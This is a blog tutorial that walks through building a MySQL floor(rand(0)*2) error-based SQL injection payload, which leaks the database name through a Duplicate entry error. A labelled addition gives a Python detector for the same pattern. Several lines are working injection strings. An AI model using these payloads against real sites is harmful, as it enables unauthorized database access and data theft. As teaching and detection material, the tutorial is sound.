This is an error that occurs when these three functions are used together in a particular situation.
First, look at the classic floor() injection statement:
and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)
At first glance it may seem overwhelming, but let's start with the basics and work up to the full statement at the end.
First, the condition under which the floor() error is generated:
select count(*),floor(rand(0)*2)x from security.users group by x
The x in floor(rand(0)*2)x is an alias for floor(rand(0)*2),
so that group by meets floor(rand(0)*2) (if you'll excuse the phrasing).
The underlying principle is not analyzed here; a few links that explain it are attached at the end.
First, look at the result of executing it directly:

The Duplicate entry error here is exactly what we want. The error is raised at floor(rand(0)*2), and the 1 is determined by the error principle. So far we haven't written any of the subqueries we want.
Next, we add the desired subquery at the error location, joining it on with concat():
select count(*) ,concat(database(),floor(rand(0)*2))x from security.users group by x
security is the database name we wanted; the 1 is the value concatenated on from the previous step.
But can it be used directly now? Let's see what happens when we append it directly after and:
select * from security.users where id=1 and (select count(*) ,concat(database(),floor(rand(0)*2))x from security.users group by x)
This reports an error. Searching Baidu turns up many explanations for it. My understanding is that the result of the select statement we built is a result table, while and needs a Boolean value, that is, zero or non-zero. Since the result of the select is a table, we can nest it in another query and select from that table again, this time selecting a non-zero number:
select 1 from (select count(*) ,concat(database(),floor(rand(0)*2))x from security.users group by x)a
This last "a" does exactly the same thing as the "x" we explained earlier: it is an alias, here for the subquery in parentheses.
SQL requires an alias whenever a query is executed on the result of another query.
Then nest it into the and clause and execute:
select * from security.users where id=1 and(select 1 from (select count(*) ,concat(database(),floor(rand(0)*2))x from security.users group by x)a)
You're done.
We have completed the floor() injection statement introduced at the beginning.
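For defenders, the finished statement has a recognizable shape: count(*), floor(rand(0)*2) and group by all appearing in one request. The following Python check is an added example, not part of the original post; it flags that combination in web request lines after undoing URL-encoding and inline comments. The request lines, path and parameter name are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample requests (not real traffic); path and parameter are made up.
SAMPLE_REQUESTS = [
    "GET /item.php?id=1 HTTP/1.1",
    "GET /item.php?id=1%20and(select%201%20from%20(select%20count(*),"
    "concat(database(),floor(rand(0)*2))x%20from%20security.users%20group%20by%20x)a) HTTP/1.1",
    # Same statement with inline comments, upper case and double URL-encoding.
    "GET /item.php?id=1%2520AND(SELECT/**/1/**/FROM(SELECT/**/COUNT(*),"
    "CONCAT(DATABASE(),FLOOR(RAND(0)*2))x/**/FROM/**/security.users/**/GROUP/**/BY/**/x)a) HTTP/1.1",
    # Benign request that contains only one of the three pieces.
    "GET /search?q=floor+plans+group+by+price HTTP/1.1",
]

# The three pieces that must occur together for the floor() error to fire.
FEATURES = {
    "count": re.compile(r"\bcount\s*\("),
    "floor_rand": re.compile(r"\bfloor\s*\(\s*rand\s*\([^)]*\)\s*\*\s*2\s*\)"),
    "group_by": re.compile(r"\bgroup\s+by\b"),
}

def normalize(raw: str) -> str:
    """Undo URL-encoding (up to 3 layers), drop /*...*/ comments, fold case and whitespace."""
    text = raw
    for _ in range(3):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    return re.sub(r"\s+", " ", text).lower()

def floor_error_features(raw: str) -> set:
    """Return the names of the pieces found in one request line."""
    text = normalize(raw)
    return {name for name, rx in FEATURES.items() if rx.search(text)}

def is_floor_error_probe(raw: str) -> bool:
    """Flag only when all three pieces appear together, to limit false positives."""
    return floor_error_features(raw) == set(FEATURES)

if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(is_floor_error_probe(line), sorted(floor_error_features(line)))
```

Requiring all three pieces keeps the benign search request from matching, since it only contains group by.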
Several explanations of the floor() principle:
https://www.cnblogs.com/xdans/p/5412468.html
https://www.cnblogs.com/litlife/p/8472323.html
http://www.cnblogs.com/xishaonian/p/6227405.html
Please credit the source when reposting.
Sync to my blog: http://119.23.249.120/archives/276